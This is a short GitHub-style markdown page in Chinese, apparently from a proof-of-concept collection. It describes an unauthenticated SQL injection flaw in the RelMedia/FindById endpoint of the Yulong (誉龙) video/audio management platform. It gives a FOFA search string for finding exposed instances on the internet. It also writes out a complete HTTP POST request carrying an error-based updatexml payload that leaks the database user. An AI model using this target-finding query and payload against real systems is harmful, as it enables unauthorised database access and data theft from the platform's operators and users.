Skip to content

Latest commit

 

History

History
26 lines (18 loc) · 847 Bytes

誉龙视音频综合管理平台FindById存在SQL注入漏洞.md

File metadata and controls

26 lines (18 loc) · 847 Bytes

誉龙视音频综合管理平台FindById存在SQL注入漏洞

誉龙视音频综合管理平台 RelMedia/FindById 存在SQL注入漏洞,未经身份验证的远程攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。

fofa

body="PView 视音频管理平台"

poc

POST /index.php?r=RelMedia/FindById HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

id=1+and+updatexml(1,concat(0x7e,user(),0x7e),1)--+

img